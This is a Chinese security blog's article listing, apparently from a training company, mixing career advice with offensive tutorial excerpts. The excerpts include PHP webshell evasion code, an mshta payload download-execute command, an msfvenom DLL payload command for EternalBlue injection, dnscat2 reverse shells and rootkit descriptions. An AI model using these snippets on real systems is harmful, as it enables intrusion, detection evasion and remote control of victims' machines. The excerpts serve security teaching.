- 博客(191)
- 收藏
- 关注
原创 网络安全圈子不稳定?这些跳槽秘诀让你脱颖而出!
说到行业现状这块,网安圈子里真正的高手其实凤毛麟角,大多数人可能还停留在"半桶水"的阶段,有些人甚至靠着花言巧语在混日子,纵观近年来的裁员潮中,我们看到被优化的往往是那些"老油条"和"混子"。所以,既然选择从事网络安全行业,就没必要花拳绣腿,张嘴就来各种牛逼技术,问就是不会,无非就是玩弄别人的同时也在愚弄自己,结果就是搬起石头砸自己的脚,得不偿失。毕竟,在当前这个时代,网络安全的重要性是毋庸置疑的。2、关注CVE数据库,学习分析最新披露的漏洞,如Log4Shell、Heartbleed等重大漏洞的原理。
2024-08-30 14:24:30
755
原创 不知道这些网络安全领域专业术语别说自己搞网络安全
不过,掌握这些基本概念,至少下次听到同事们讨论"零信任、SOC"或"APT攻击"时,你就不会一脸茫然了。希望这篇文章能帮助你更好地理解网络安全的世界,提高警惕,保护好自己和身边的人,加油。: 形容那些不直接参与技术讨论或安全事件,只是围观或评论的人,通常对事件本身了解不多,但热衷于发表意见或跟风。: 指介于白帽子和黑帽子之间的黑客,通常是先进行未授权的入侵,然后再报告漏洞,行为有时模糊于法律边界。: 形容那些在技术讨论或预测中被证伪的人,通常带有讽刺意味,指某人之前的言论或行为被事实“打脸”。
2024-08-26 16:35:16
796
原创 高级渗透测试工程师会有哪些不为人知的小技巧
记得有一次,我甚至通过分析Wayback Machine上的历史网页版本,发现了一个早已被遗忘的包含敏感信息的测试页面,想想都刺激。不知道大家怎么看待无文件攻击,反正我自己就特别喜欢玩,就是尽量不在目标系统的磁盘上留下痕迹,大大降低被发现的风险。但是先别急,毕竟是社会工程学,那么你所要“渗透”得目标其中的人物信息、人物关系那是必不可少的,比如某个公司的组织结构、员工习惯等。很多人在渗透测试过程中,以为拿到shell就大功告成,nonono,这只是万里长征第一步,接下来才是真正意义上的“全军出击”。
2024-08-21 16:01:25
911
原创 兄弟别白忙活了,渗透测试原来是要这样学的!
即使是行业内的专业人士,也未必能提炼出一套系统全面的学习方案,更何况是初入行的菜鸟,面对纷繁复杂的知识体系,选择学习路线时往往无所适从。网络安全涵盖的内容很广,里面所涉及的版块很多,但请不要慌,学习就好比修建房子一样,想要把房子修建的更高更牢固,地基整好了接下来就是砌砖了,一块一块搭建,慢慢来。手机的频繁打扰、社交活动的诱惑,都可能成为前进路上的绊脚石,导致学习进程停滞不前。网络安全的本质在于实战,没有导师的指引,仅凭一己之力摸索,很容易陷入理论与实践脱节的困境,空谈无益,实战才是检验真理的唯一标准。
2024-08-16 10:46:01
752
原创 想转行网络安全,可以先看看过来人的建议
主要是现在社会上有不少人受周围环境的影响,逐渐迷失在“躺平”的氛围中,追求短暂的享乐,而忽视了长期的职业规划。这就意味着,尽管有些领域可能上手较快,但要在网络安全领域长远发展,需要深厚的专业知识和技能。无论你是出于兴趣还是为了更好的职业前景选择转行,只要保持热情和毅力,相信你一定能在网络安全这个广阔的领域找到属于自己的一片天地。他们的初衷可能是觉得这个行业体面,不需要体力劳动,办公环境好,薪资回报高,而且作为通用性人才,到哪里都不愁找不到工作。当然了,随着你本身技术水平的提升,薪资也会相应提高的。
2024-08-15 15:18:22
910
原创 史上最全渗透测试学习指南,小白也能轻松hold住!
归根结底,所需的基础不过是扎实的编程语言功底,同时还需要一定的耐心,屁股能坐的住。作为网络安全行业的老司机,一路走来,趟过了各种坑,填平了不少难,而作为一个高速发展进步的行业,定期提升自己是作为一名合格的网安人所必须的,也是非常必要的。第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索等等。
2024-08-14 10:29:34
733
原创 小小免杀PHP木马生成器拿下
behinder_for_aes aes加密并混淆过的webshell。default_for_aes aes加密并混淆过的webshell。一般木马的密码为2,behinder的密码为默认的rebeyond。生成所有木马 图形化界面还在开发,更加复杂加密仍在开发。inject_for_aes 对inject的混淆。xorN xorN加密方式对其xor拆分多次加密。这里设置的是一个GET请求1=admin的验证。default 蚁剑,菜刀,哥斯拉都可以连接。,需要指定-n 加密次数。
2024-08-13 14:12:45
523
原创 如果你懂开发,我真心劝你来试试网络安全
懂开发的网安人才之所以如此吃香,正是因为他们能够灵活运用这些编程技能来应对各种安全挑战。这种全面的技能组合正是使得懂开发的网安人才在就业市场上如此抢手的原因。在网络安全领域,懂开发的人才正成为各大企业争相招揽的对象。这类全能型选手之所以如此抢手,是因为他们能够灵活运用各种编程技能来应对复杂多变的网络威胁。比如著名的豆瓣、知乎、Instagram、Seebug、TangScan、BugScan就是用Python开发的。当然,Python并非网络安全领域唯一的主角。
2024-08-12 10:37:24
481
原创 为什么企业越来越看重懂管理的网络安全人才?
而且,你还得和其他部门协调,比如跟IT部门沟通修复漏洞,跟法务部门讨论数据泄露的影响。这哪是单纯的技术能搞定的?由于现在的就业局势紧迫,想找工作的人实在是太多了,这也就导致有些企业老板们变得越来越精打细算,如果条件允许,或许比选老婆还要求多。有时候,你甚至得说服客户增加安全预算,想想就刺激,头脑耿直点那就多少带点费劲了。万一真的中招了,你得协调各个部门,控制损失,还要应对媒体和客户。毕竟,多一项技能,就多一份保障,也就会多一条出路。这些管理方面的技能,配上你过硬的安全技术,绝对能让你成为企业眼中的香饽饽。
2024-08-07 11:39:07
364
原创 介绍一个基于Ring 3 的rootkit
R77 是一个 Ring 3 rootkit,它隐藏了所有内容:文件、目录进程和 CPU/GPU 使用情况注册表项和值服务业TCP 和 UDP 连接交汇点、命名管道、计划任务。
2024-08-06 11:15:16
668
原创 对比其他IT类目,为什么说零基础小白学网络安全更合适?
这些知识的积累需要至少一年的时间,而即使掌握了这些技能,面对快速变化的技术环境和激烈的市场竞争,仍然难以保障就业。此外,软件测试的职业路径相对单一,从初级测试工程师到高级测试工程师,再到测试经理,这条路径的上升空间相对狭窄,难以提供多样化的发展机会。对于零基础小白来说,不仅要面对技术学习的压力,还要应对高强度的工作节奏,这无疑增加了学习和工作的难度。首先,从学习难度来看,网络安全的入门相对容易。此外,随着云计算和物联网的普及,云安全和IoT安全也成为了炙手可热的新兴领域,为安全从业者提供了更多的选择。
2024-08-05 10:17:44
536
原创 找个培训班学网络安全几个月真的有用吗?
举个例子,当你在学习如何进行Web应用渗透测试时,培训班可能会提供一个模拟的有漏洞的网站,让学员尝试各种攻击手法。网络安全这个领域涉及的知识面非常广,从操作系统、网络协议到编程语言,再到各种安全工具的使用,每一块都很复杂。再者,培训班的老师通常都是业内资深专家,他们不仅能教授知识,还能分享真实的工作经验和行业见解。如果你对网络安全感兴趣,想从事网络安全行业,并且想通过报培训班提升技术,那么不妨看看我们阿一,作为一个专注于网络安全的培训机构,我们阿一能够帮助你实现上述目标,为你的网络安全之路打下坚实基础。
2024-08-02 17:05:39
513
1
原创 你了解渗透测试吗?渗透测试在网络安全行业属于食物链什么层级?
C段指的是同一内网段内的其他服务器,每个IP有ABCD四个段,举个例子,192.168.0.1,A段就是192,B段是168,C段是0,D段是1,而C段嗅探的意思就是拿下它同一C段中的其中一台服务器,也就是说是D段1-255中的一台服务器,然后利用工具嗅探拿下该服务器。比如,公司的邮箱格式,公司的员工姓名,以及与该公司有关的任何信息。对目标主机进行扫描,而不仅仅是对网站进行扫描,扫描目标主机开放了哪些端口,扫描端口运行的服务,目标主机上有哪些漏洞,主机扫描的工具也有很多,比如:Nessus。
2024-07-31 15:39:26
740
原创 傻瓜式PHP-Webshell免杀学习手册,零基础小白也能看懂
首先,要知己知彼,才能针对性做出策略来使得WebShell成功免杀通过对上面所说两部分敏感内容的拼接、混淆以及变换,来绕过WAF的检测逻辑,如下:$tmp = "";$a = $a/10;//sysTem(高危函数)$f($_POST['aabyss']);同样,可以配合文件名玩出一些花活,我们建一个PHP名字为976534.php$tmp = "";$a = $a/10;
2024-07-29 11:58:37
1218
原创 细说网络安全五家龙头企业,你去过哪一家?
在当前快速推进的数字化转型浪潮中,网络安全问题日益显著,因此安全态势感知系统作为提升网络安全防御能力的关键工具,正逐步成为各行业广泛关注的焦点。其次,数字安全在终端安全、云安全等领域拥有丰富的实践经验和成功案例,能够提供成熟的解决方案。启明星辰的这一解决方案不仅仅具备强大的数据采集能力和广泛的应用场景,还提供定制化的解决方案,以满足不同行业客户的特定需求。他们提供多样化的安全产品和服务组合,能够满足不同客户的需求,并通过与阿里云等云服务商的深度合作,增强了在云安全领域的能力。
2024-07-25 14:36:40
2081
1
原创 python反序列化基础
相应地,把“字符串 -> 对象”的过程称为“反序列化”。需要保存一个对象的时候,就把它序列化变成字符串;需要从字符串中提取一个对象的时候,就把它反序列化。各大语言都有序列化库,而很多时候,不恰当的反序列化会成为攻击的目标。如果我们要存储的内容只是一条字符串或是数字,那么我们只需要把它写进文件就行。本文融合了多个引用案例,融合在了一起,旨在说明反序列化个人认为是payload使用截断将执行调用的库和payload执行的代码,压入不同的位置,汇编运行的时候,直接执行了恶意代码。要把这样的dairy实例。
2024-07-19 10:24:48
239
原创 为什么有的人可以自学网络安全成才而你学废了
深入学习Web开发的基础知识,包括表单操作、Session/Cookie、JWT、LocalStorage等,了解它们的作用和基本原理。我们的目标不是成为程序员。在学习网络安全的过程中,遇到不会的再去补充,这样更有针对性,耗时也更少。Web基础部分学习HTML、CSS和JavaScript的开发和使用,特别是动手操作,熟悉JavaScript、Ajax和JQuery等技术。Linux部分的学习重点是掌握文本编辑、文件操作、网络配置、权限管理、磁盘管理、用户管理等基本命令,建立起对Linux系统的基本认知。
2024-07-17 10:19:33
570
原创 使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows
这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了。剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层。将这个文件上传至win10靶机运行。进入弹回来的shell。
2024-07-15 11:03:09
399
原创 网络安全领域红蓝对抗里关于红队全方位解析
无论你的目标是成为一名优秀的渗透测试工程师,还是矢志成为影响整个行业的安全专家,保持学习的热情、与时俱进的态度以及对安全的热爱,都是在这个领域取得成功的关键。对于初级红队成员来说,最重要的是保持学习的热情,不断提升自己的技能。提到红队,似乎行内都会默认为红队就是攻击队,而蓝队则是防守队,大部分文章也会把红队解释为是一种全范围的多层攻击模拟,我们平常沟通确实也会这样说,而事实上,到底什么才是红队?这个阶段的红队成员应该注重实战经验的积累,参与更多的实际项目,同时不断学习新的技术和攻击方法。
2024-07-11 14:13:07
1328
原创 阿一课代表今日分享之使用dnscat2 进行dns隧道反弹shell(直连模式linux对linux)
Dns解析过程:系统发出dns解析之前会先看看本地是否保存了相关域名的解析,系统检测到hosts文件中没有响应的域名解析的时候会发送给本地dns解析服务器进行解析,解析之前会看看缓存中是否存在,如果没有,再将解析请求发给下一个dns服务器。gem install bundler 是一个在 Ruby 环境中使用的命令,用于安装 Bundler 这个 gem(gem 是 Ruby 的包管理器)Bundler 是一个帮助管理 Ruby 项目依赖的工具,它可以确保你的项目在不同的环境中使用相同版本的 gems。
2024-07-10 14:06:03
1120
原创 阿一课代表随堂分享:红队反向代理之使用frp搭建反向代理
frp 是一个可用于内网穿透的高性能的反向代理应用,分为服务端frps和客户端frpc,支持 tcp, udp, http, https 协议。利用处于内网或防火墙后的机器,对外网环境提供 tcp 和 udp 服务,例如在家里通过 ssh 访问处于公司内网环境内的主机。4.外网用户连接到客户端指定的端口,服务端通过和客户端的连接将数据转发到客户端;2.客户端连接到服务端的主端口,同时告诉服务端要监听的端口和转发类型;1.服务端运行,监听一个主端口,等待客户端的连接;内网ip:10.10.10.201。
2024-07-09 10:51:37
577
原创 centos7.6 用yum安装java8
2.经过试验发现用yum install java-1.8.0-openjdk 时最后 /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-3.b13.el7_5.x86_6目录下只用一个jre文件(这跟平时有差异)最后用 yum -y remove java-1.8.0-openjdk 的方式卸载之后重新 yum -y install java-1.8.0-openjdk-devel.x86_64 才是正常。
2024-07-08 10:32:24
275
原创 网络安全领域的小众却前途无量的细分角色
工作形式无非就是需要了解各种智能设备的工作原理,找出可能存在的安全漏洞,并想办法修复。他们需要了解各种云平台(比如阿里云、腾讯云),知道如何正确配置安全选项,设置各种"安全门槛",不让坏人有机可乘。然而,这个行业远比表面看起来复杂,许多新兴的细分领域正在悄然兴起,未来发展前景不可限量。这个领域需要了解常见的医疗设备是怎么工作的,还要懂网络安全,以及医疗行业的一些特殊规定。几年前国外就发生过医院被勒索软件攻击的事件,结果医疗设备都不能正常工作,医院不得不取消了大量手术,造成了严重后果。具体如何没深入研究)
2024-07-08 10:22:28
482
1
原创 网络安全快不行了?现在入行网络安全会被卷死吗?
说了这么多,网络安全这圈子确实自带一股子“卷”的气息哈,毕竟技术始终都是要不停的学习提升进步的,要是一直抱着老黄历不放,还以为能靠过去的那一套混江湖,那在这个日新月异的时代,被淘汰出局简直就是板上钉钉的事儿。由此,我们不难理解,为何有些混子会滋生出逃避现实的心态,他们面对专业技能提升的挑战时,选择的不是迎难而上,而是试图通过散布焦虑情绪,来减少潜在的竞争者,以此为自己争取一丝苟延残喘的机会。有了前面两步的打底,是时候接触一些网络安全的技术了,刚刚开始这个阶段,仍然不要把自己圈起来只学某一个方向的技术。
2024-07-05 11:43:09
542
1
原创 渗透新手福利来了:windows下载执行命令大全
参考:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/mshta http://webserver/payload.hta --->短域名:http://sina.lt/-->mshta http://t.cn/RYUQyF8。参考:https://github.com/3gstudent/Javascript-Backdoor。将以上保存为downfile.vbs。
2024-07-02 11:05:58
700
原创 阿一网络安全培训中心专门为你准备了一份WScan使用教程
因为Wscan不内置任何POC插件,但Wscan的prometheus插件引擎支持Nuclei、XRAY、Goby标准POC插件,与其他扫描器不同的是Wscan可以自定义POC深度,从而发现更多的Web安全问题。这时在wscan监听7777端口,浏览器的代理开启burp的代理,是8080端口,经过burp会转发到7777端口,wscan就会进行扫描了。在wscan_scan_result.html中可以详细的看到扫描的结果,可以查看各个漏洞的具体信息,payload 请求包 响应包等等。
2024-06-28 16:46:16
1137
原创 Cobalt Strike DLL用于永恒之蓝注入
我们在对存在MS17010的漏洞主机进⾏DLL注⼊的时候,⼀般都是⽤的Meataploit的msf venom⽣成出来的,所以每次上线之 后基本都是要经过相对⽐较繁琐的操作之后转到Cobalt Strike去,这样就会显得⾮常⿇烦。转化命令:msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o shell.dll。生成文件后,打开msf,用命令将这个bin文件转化为dll文件。
2024-06-25 16:08:09
393
原创 一文带你全面详细了解安全运维
1、IP地址相关IP地址属于网络层地址,用于标识网络中的节点设备。IP地址由32bit构成,每8bit一组,共占用4个字节。IP地址由两部分组成,网络位和主机位。用于区分一个IP地址的网络位和主机位。子网掩码是用来判断任意两台计算机的IP地址是否属于同一子网络的根据。子网划分是为了解决网络IP不够用的情况。就是指同时向子网中的多台计算机发送消息,并且所有子网中的计算机都可以接收到发送方发来的消息。子网地址的范围就是网络位不变,主机位从全0到全1这个范围。
2024-06-21 11:23:00
1935
原创 阿一网络安全学院干货科普篇之应急响应【下】
概念:存在于web服务器端的脚本后门,以asp、php、jsp等网页文件形式存在的一种命令执行环境特性:与服务端正常脚本运行原理相同。可以绕过防火墙对主机进行操作。可进行文件上传、下载、命令执行等。webshell操作权限取决于解析器运行权限2、一句话木马概念:通过向服务端提交一句简短代码,配合本地客户端来实现webshell功能特性:变形多,易隐藏、难发现NTFS文件系统中文件可以存在多个数据流,其他文件流可以寄宿在主文件流中(流寄托于宿主)。
2024-06-18 16:47:37
869
2
原创 阿一网络安全学院干货科普篇之应急响应【上】
安全人员在遇到突发事件后所采取的措施和行动。发生在计算机系统或网络上威胁安全的事件。如黑客入侵、信息窃取等。信息安全生命周期的必要组成部分,这个生命周期包括:对策、检测和响应。运维人员无法迅速处理安全事件时,需要第三方厂商提供一种能发现并解决问题的有效服务手段。控制影响范围确保业务正常运转、还原攻击场景、找到问题根源、最后追溯攻击源。以最快速度恢复系统的保密性、完整性和可用性,阻止和减小安全事件带来的影响。积极预防、及时发现、快速反应、确保恢复。
2024-06-17 14:09:26
1256
原创 阿一网络安全学院来向你科普关于企业安全服务
1、可管理安全服务在提供传统安全产品及安全服务的基础上,逐步开展安全运营,用开放的安全平台连接卓越的产品和服务,洞察安全态势,为企业级用户提供小时级的闭环安全保障。2、安全咨询服务为客户进行全方位风险评估,帮助客户掌握安全现状与目标之间的差距、设计及落实安全体系、满足各种合规性要求、采取措施降低安全风险,进而提高安全管理实效、获取信息安全管理体系认证等。3、安全评估服务。
2024-06-11 14:05:12
984
1
原创 阿一网络安全学院课代表教你如何快速隐藏CS
原版的CobaltStrike存在某些未授权访问漏洞,以及特征太过于明显,以至于很容易被C2检测器发现。本文记录了一些隐藏特征的方法,这些方法不涉及更改cs底层jar文件,适合小白(指自己)快速部署。本文目标:从流量、端口、访问页面等方面尽可能隐藏cs流量,运用cdn实现IP隐匿,同时实现linuxC2通讯功能。
2024-05-31 11:17:12
927
原创 Debian下配置防火墙iptables
建议将其保存为/etc/init.d/iptables,然后chmod +x /etc/init.d/iptables 添加运行权限。iptables -A INPUT -j REJECT #(注意:如果22端口未加入允许规则,SSH链接会直接断开。1、将iptables配置保存到/etc/iptables,这个文件名可以自己定义,与下面的配置一致即可。若要停止iptables,iptables -F清空所有配置效果等同于停止。#配置,禁止进,允许出,允许回环网卡。#禁止其他未允许的规则访问。
2024-05-27 13:58:58
2523
原创 在某云服务器上搭建公网kali linux2.0
注意:If=你下载的kali的名称dd bs=4M if=kali-linux-2020.3-installer-amd64.iso of=/dev/vdb。保存后继续设置root密码,输入sudo passwd root设置root密码sudo passwd root。boot之后进入 kali的安装界面,hd1对应的是我的vdb数据盘不是系统盘哈!保存后执行grub2-mkconfig -o /boot/grub2/grub.cfg。慢慢慢~注意注意注意 下图 安装完成后 选择返回 返回 返回!
2024-05-21 16:04:16
1047
原创 易宝OA-ExecuteQueryForDataSetBinary处sql注入
易宝OA的/api/system/ExecuteQueryForDataSetBinary处存在sql注入漏洞。
2024-05-14 11:46:43
400
原创 海康运行管理中心 RCE
海康运行管理中心系统使用低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限。PS:本文首发自公众号【长歌安全】
2024-05-09 10:20:59
843
原创 D-Link设备远程命令执行漏洞(CVE-2024-3273)
D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞。
2024-04-30 09:46:41
631
4
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人